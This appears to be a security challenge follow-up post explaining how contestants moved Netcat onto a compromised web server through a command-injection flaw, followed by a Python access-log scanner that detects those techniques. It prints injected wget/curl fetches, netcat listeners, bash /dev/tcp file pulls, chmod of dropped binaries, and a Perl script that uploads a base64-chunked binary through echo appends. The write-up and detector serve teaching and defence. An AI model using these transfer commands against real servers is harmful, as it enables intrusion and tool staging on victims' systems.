I purposely designed the challenge so that it did not include Netcat on that server so that you'd have to devise a method for moving it there. Sorry that I didn't include that step in my answers. My answers were getting really long (11 typed pages), so I didn't include every single command. I'm glad you guys asked about this one, because it deserves to be talked about in more detail. Thank you! These challenges are all about sharing techniques among security practitioners, and the techniques associated with this one were fantastic.
Mark Baggett's answer did indeed include a method for getting Netcat there, but he sent me his solution in multiple parts, and I did not include the part of Mark's answer that explained how he got nc there. I'll mention his technique below (with an excerpt of the submitted part that included the transfer) as I go through the methods for moving nc to web1.
So, let me tell you about how different people (including Mark), got Netcat to web1. All of these techniques relied on the command-injection flaw on web1:
Method i) Inject a command that invokes wget to connect to Santa's laptop and pull down the Linux version of Netcat. This is the method used by Mark Baggett and many other people. Here is the syntax he specified in the other component of his answer:
"from santa's linux box
nc -l -p 3000 < nc
in webpage we do something like this...
http://web1?vulnerablepage.php?vulnerable=normal; wget jailmasterlaptop:3000
Give it a minute or so to finish the transfer to the machine and hit control-c on the netcat on his box
http://web1?vulnerablepage.php?vulnerable=normal; mv index.html nc
http://web1?vulnerablepage.php?vulnerable=normal; chmod 777 nc"
It was a nice approach, in that he remembered to move index.html into nc (in effect renaming it), and he even chmod'ed it so that any user (including apache) could read, write, and execute it. I gave Mark extra points for remembering the mv and chmod, because several others forgot it. Richard J. used a similar technique, as did Peter Jackson (who also showed how it could be done with curl). Several others did as well.
Method ii) Inject the echo command to build an FTP command file on web1, and then inject a command to invoke an FTP client to run commands from that file. Zoher used a variation of this technique with the lftp command.
Method iii) Use tftp to move the file by injecting a command to invoke the tftp client on web1. This method depends on Santa's Linux box having a tftpd and web1 having a tftp client, which they may or may not have.
Method iv) Using /dev/tcp on web1. I really liked this approach, because it uses the built-in capabilities of bash on many Linuxes for interacting with /dev/tcp via shell redirects. Several people tried this, but many of them had improper syntax. As you may know, /dev/tcp can be used via bash on some Linux systems (typically non-Debian derived Linuxes) to open an outbound TCP connection. You can push data across that connection easily by just cat'ting or echo'ing it into /dev/tcp. But, how can you pull data across it, for file transfer? Raul Siles' answer included syntax for doing that, as follows:
"Kris made available a copy of the Linux netcat binary through [his own laptop] on port TCP/80 (a little stealthy trick to simulate a web server connection in case someone checks outbound traffic from web1) using netcat:
[Santa's_Laptop] $ nc -l -p 80 < /usr/bin/nc
Using the web-based command injection flaw, Kris launched a series of commands to initiate a connection from web1 to [his own laptop] on port TCP/80 and retrieve the Linux netcat binary. The file was copied under /tmp, as a readable and executable file.
[web1] $ exec 6<>/dev/tcp/Linnie/80
[web1] $ cat <&6 >/tmp/nc
[web1] $ ls -l /tmp/nc
-rw-rw-r-- 1 apache apache 18596 2008-12-30 13:24 /tmp/nc
[web1] $ md5sum /tmp/nc
77e752183c698f76f00c0de5d070314d /tmp/nc
[web1] $ chmod 500 /tmp/nc
[web1] $"
Ryan L. had a nice variation, which again involved setting up a Netcat listener on Santa's own box, ready to deliver up the netcat executable. He then injected this command into web1:
"cat < /dev/tcp/<Kris's IP Address>/8080 > /tmp/nc; chmod 755 /tmp/nc;"
These are quite nice techniques, and kudos to Raul and Ryan for using them. Note that both remembered the chmod. Raul even went further and md5sum'med the file. Note also that Raul, to get that output displayed, must have been using an interactive shell, likely delivered via /dev/tcp on another port.
Method v) Create a perl script that runs on Santa's laptop to encode and move the file. Peter Jackson used this approach, saying it's what he'd rely on if wget or curl were not available. His script base64-encoded netcat and chopped it up into little parts, transmitting them via the command injection flaw 57 bytes at a time, injecting the echo command into web1 with >> to append each chunk of Netcat to the file he built on the target. This also was a very cool approach. Here's Peter's code:
-------
#!/usr/bin/perl
use strict;
use warnings;
use MIME::Base64 qw(encode_base64);
use LWP 5.64;

my $url = 'http://web1/vuln.cgi';
my $browser = LWP::UserAgent->new;

# read the netcat binary in 57-byte chunks (57 bytes encode to exactly one
# 76-character base64 line, so no line break lands inside a chunk) and
# submit each base64 string to the vulnerable URL
open(FILE, "<", "nc") or die "$!";
binmode(FILE);
while (read(FILE, my $buf, 57)) {
    my $base64chr = encode_base64($buf);
    # remove the trailing line break
    chomp($base64chr);
    my $response = $browser->post( $url,
        [ 'cmd' => "echo $base64chr >> /tmp/.../nc.base64" ]
    );
    die "$url error: ", $response->status_line
        unless $response->is_success;
}
close(FILE);
-----
There were some other variations and approaches, but those were the main ones.
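As an added example (not part of the original post or of any submitted answer), here is the check I'd want on the defending side of web1: a scanner over Apache combined-format access-log lines that flags the injected transfer commands from the methods above (wget/curl/tftp/ftp fetches, bash /dev/tcp redirections, chmod of the dropped file, and the repeated "echo ... >>" appends that reassemble a file chunk by chunk). It decodes the request repeatedly so double-URL-encoded payloads are still seen. All IPs, hostnames, paths and log lines below are constructed for the example. One caveat: Peter's script sends its chunks in POST bodies, which a standard access log does not record, so the chunked-upload sample is shown as GET requests; catching the POST form needs request-body logging (for example from a web application firewall module).

```python
"""Flag command-injection file-drop attempts in web access logs (added example)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache combined log: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# A command boundary inside an injected query: start of string, shell separator, or '='.
SEP = r'(?:^|[;&|=`\s])'

# Indicator name -> regex applied to the fully URL-decoded request path.
# These mirror the transfer methods in the write-up; tune them to local traffic.
INDICATORS = {
    "fetch_tool": re.compile(SEP + r'(?:wget|curl|tftp|l?ftp)\s', re.I),
    "dev_tcp": re.compile(r'/dev/tcp/[^/\s]+/\d+'),
    "append_chunk": re.compile(SEP + r'echo\s+\S+\s*>>\s*(?P<target>\S+)', re.I),
    "chmod_exec": re.compile(SEP + r'chmod\s+[0-7]{3,4}\s', re.I),
}


def decode_path(path: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253B -> %3B -> ';') are exposed."""
    for _ in range(rounds):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def scan_line(line: str):
    """Return (ip, decoded_request, {indicator: detail}) or None if clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_path(m.group("path"))
    hits = {}
    for name, rx in INDICATORS.items():
        hit = rx.search(decoded)
        if hit:
            # for appends, keep the target file so repeated chunks can be correlated
            hits[name] = hit.group("target") if name == "append_chunk" else hit.group(0).strip()
    if not hits:
        return None
    return m.group("ip"), decoded, hits


def scan_log(lines, chunk_threshold: int = 5):
    """Scan lines; also report chunked uploads (>= chunk_threshold appends to one file from one IP)."""
    findings, appends = [], Counter()
    for line in lines:
        result = scan_line(line)
        if result is None:
            continue
        ip, decoded, hits = result
        findings.append({"ip": ip, "request": decoded, "indicators": sorted(hits)})
        if "append_chunk" in hits:
            appends[(ip, hits["append_chunk"])] += 1
    chunked = [{"ip": ip, "target": target, "count": n}
               for (ip, target), n in appends.items() if n >= chunk_threshold]
    return findings, chunked


# Constructed sample log lines (not real traffic); 10.0.0.9 plays the attacker's laptop.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Dec/2008:13:20:01 -0500] "GET /index.php?page=normal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Dec/2008:13:21:10 -0500] "GET /vulnerablepage.php?vulnerable=normal;wget%20http://10.0.0.9:3000 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Dec/2008:13:22:00 -0500] "GET /vulnerablepage.php?vulnerable=normal%3Bmv%20index.html%20nc%3Bchmod%20777%20nc HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Dec/2008:13:24:00 -0500] "GET /vulnerablepage.php?vulnerable=x%3Bexec%206%3C%3E/dev/tcp/10.0.0.9/80%3Bcat%20%3C%266%20%3E/tmp/nc HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    # double-encoded variant: %253B -> %3B -> ';'
    '10.0.0.9 - - [30/Dec/2008:13:25:00 -0500] "GET /vulnerablepage.php?vulnerable=x%253Bcurl%2520http://10.0.0.9/nc HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
] + [
    # six base64 chunks appended to the same file, shown as GET for the example
    f'10.0.0.9 - - [30/Dec/2008:13:3{i}:00 -0500] "GET /vuln.cgi?cmd=echo%20QUJD{i}%3D%3D%20%3E%3E%20/tmp/.../nc.base64 HTTP/1.1" 200 0 "-" "Mozilla/5.0"'
    for i in range(6)
]

if __name__ == "__main__":
    found, chunks = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["indicators"], f["request"])
    for c in chunks:
        print("chunked upload:", c)
```

The append correlation is the part worth keeping even if the keyword patterns are tuned away: many small writes to one file from one client is the shape of Peter's method regardless of which command does the writing.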
Again, as you can see, these answers were stellar, which is why we saw so many honorable mentions.
Thanks again, guys!
--Ed.